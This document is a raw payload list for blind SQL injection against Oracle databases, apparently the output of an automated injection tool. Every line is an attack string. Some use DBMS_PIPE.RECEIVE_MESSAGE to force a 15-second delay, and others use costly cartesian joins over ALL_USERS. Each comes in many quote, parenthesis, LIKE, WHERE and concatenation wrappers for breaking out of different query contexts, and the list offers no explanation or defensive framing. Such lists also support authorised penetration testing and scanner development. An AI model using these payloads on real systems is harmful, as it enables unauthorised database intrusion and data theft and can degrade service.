) AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15)
') AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15)
' AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15)
" AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15)
) AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND (4751=4751
)) AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND ((9726=9726
))) AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND (((7867=7867
 AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15)
') AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND ('zLYd'='zLYd
')) AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND (('gqhC'='gqhC
'))) AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND ((('HGye'='HGye
' AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND 'ekKA'='ekKA
') AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND ('rHrN' LIKE 'rHrN
')) AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND (('KOma' LIKE 'KOma
'))) AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND ((('garS' LIKE 'garS
' AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND 'YlCs' LIKE 'YlCs
") AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND ("KQWV"="KQWV
")) AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND (("hMXd"="hMXd
"))) AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND ((("UfYM"="UfYM
" AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND "fGtE"="fGtE
") AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND ("pxNJ" LIKE "pxNJ
")) AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND (("SHCH" LIKE "SHCH
"))) AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND ((("giwr" LIKE "giwr
" AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND "LGlv" LIKE "LGlv
%') AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND ('%'='
%')) AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND (('%'='
%'))) AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND ((('%'='
%' AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND '%'='
%00') AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND ('gjLH'='gjLH
%00' AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND 'EAPs'='EAPs
') WHERE 6282=6282 AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) -- 
") WHERE 1055=1055 AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) -- 
) WHERE 1633=1633 AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) -- 
' WHERE 4091=4091 AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) -- 
" WHERE 9587=9587 AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) -- 
 WHERE 9131=9131 AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) -- 
'||(SELECT 'ImTI' FROM DUAL WHERE 8628=8628 AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) )||'
'||(SELECT 'dcUk' WHERE 7272=7272 AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) )||'
'+(SELECT tCiT WHERE 6279=6279 AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) )+'
'+(SELECT 'rOmg' WHERE 7513=7513 AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) )+'
' IN BOOLEAN MODE) AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) #
) AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
') AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
' AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
" AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
)) AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
))) AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
 AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
')) AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
'))) AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
") AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
")) AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
"))) AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
%') AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
%')) AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
%'))) AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
%' AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
%00') AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
%00' AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
') WHERE 4786=4786 AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
") WHERE 8988=8988 AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
) WHERE 6090=6090 AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
' WHERE 6408=6408 AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
" WHERE 8052=8052 AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
 WHERE 3808=3808 AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
'||(SELECT 'DEBH' FROM DUAL WHERE 2216=2216 AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
'||(SELECT 'DKUc' WHERE 2744=2744 AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
'+(SELECT ghcQ WHERE 7538=7538 AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
'+(SELECT 'rBcr' WHERE 9616=9616 AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
' IN BOOLEAN MODE) AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
) AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
') AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
' AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
" AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
) AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (7890=7890
)) AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((2135=2135
))) AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (((9778=9778
 AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
') AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('DdOX'='DdOX
')) AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (('wNgu'='wNgu
'))) AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((('EBcy'='EBcy
' AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'HNJp'='HNJp
') AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('YUaw' LIKE 'YUaw
')) AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (('nAPi' LIKE 'nAPi
'))) AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((('ettW' LIKE 'ettW
' AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'muaY' LIKE 'muaY
") AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ("kwei"="kwei
")) AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (("Ufwl"="Ufwl
"))) AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((("jtQj"="jtQj
" AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND "nFkr"="nFkr
") AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ("NlLM" LIKE "NlLM
")) AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (("qbpx" LIKE "qbpx
"))) AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((("Pows" LIKE "Pows
" AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND "GHsA" LIKE "GHsA
%') AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('%'='
%')) AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (('%'='
%'))) AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((('%'='
%' AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND '%'='
%00') AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('RYgZ'='RYgZ
%00' AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'bWGv'='bWGv
') WHERE 3398=3398 AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) -- 
") WHERE 1385=1385 AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) -- 
) WHERE 1850=1850 AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) -- 
' WHERE 2733=2733 AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) -- 
" WHERE 3530=3530 AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) -- 
 WHERE 2620=2620 AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) -- 
'||(SELECT 'ZwWp' FROM DUAL WHERE 6843=6843 AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) )||'
'||(SELECT 'GQlt' WHERE 4942=4942 AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) )||'
'+(SELECT bgZx WHERE 2195=2195 AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) )+'
'+(SELECT 'qYFM' WHERE 5110=5110 AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) )+'
' IN BOOLEAN MODE) AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) #
) AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
') AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
' AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
" AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
)) AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
))) AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
 AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
')) AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
'))) AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
") AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
")) AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
"))) AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%') AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%')) AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%'))) AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%' AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%00') AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%00' AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
') WHERE 4552=4552 AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
") WHERE 9860=9860 AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
) WHERE 1130=1130 AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
' WHERE 3128=3128 AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
" WHERE 3567=3567 AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
 WHERE 8912=8912 AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
'||(SELECT 'jxFw' FROM DUAL WHERE 6764=6764 AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
'||(SELECT 'aVWN' WHERE 2476=2476 AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
'+(SELECT QOIw WHERE 4086=4086 AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
'+(SELECT 'aRxS' WHERE 9632=9632 AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
' IN BOOLEAN MODE) AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
-8751
-1412) OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15)
-1278') OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15)
-6579' OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15)
-1682" OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15)
-7494) OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND (6692=6692
-1995)) OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND ((1151=1151
-1224))) OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND (((5985=5985
-7260 OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15)
-9846') OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND ('bScs'='bScs
-8380')) OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND (('Eili'='Eili
-9834'))) OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND ((('zkMu'='zkMu
-6987' OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND 'cEhV'='cEhV
-3234') OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND ('MlOy' LIKE 'MlOy
-8061')) OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND (('Ldrt' LIKE 'Ldrt
-4838'))) OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND ((('sdiR' LIKE 'sdiR
-2554' OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND 'EtsS' LIKE 'EtsS
-7786") OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND ("Dwkr"="Dwkr
-4624")) OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND (("llNV"="llNV
-1855"))) OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND ((("GsHq"="GsHq
-5756" OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND "XFah"="XFah
-1908") OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND ("Kupw" LIKE "Kupw
-5608")) OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND (("ecbu" LIKE "ecbu
-2753"))) OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND ((("WXJZ" LIKE "WXJZ
-1550" OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND "iolG" LIKE "iolG
-5387%') OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND ('%'='
-8317%')) OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND (('%'='
-4156%'))) OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND ((('%'='
-4585%' OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND '%'='
-2014%00') OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND ('dKmt'='dKmt
-1913%00' OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) AND 'AUdZ'='AUdZ
-3818') WHERE 7650=7650 OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) -- 
-4458") WHERE 6564=6564 OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) -- 
-5551) WHERE 6271=6271 OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) -- 
-1127' WHERE 3652=3652 OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) -- 
-9132" WHERE 5678=5678 OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) -- 
-8242 WHERE 4243=4243 OR 4473=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(99)||CHR(97)||CHR(112),15) -- 
-9509) OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
-7311') OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
-6487' OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
-5798" OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
-5375) OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (1669=1669
-1992)) OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((4319=4319
-1952))) OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (((5772=5772
-4320 OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
-6652') OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('OvnL'='OvnL
-9771')) OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (('Gqus'='Gqus
-4569'))) OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((('zqPA'='zqPA
-7774' OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'Wsvv'='Wsvv
-8892') OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('alBv' LIKE 'alBv
-5172')) OR 1199=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (('GTYv' LIKE 'GTYv
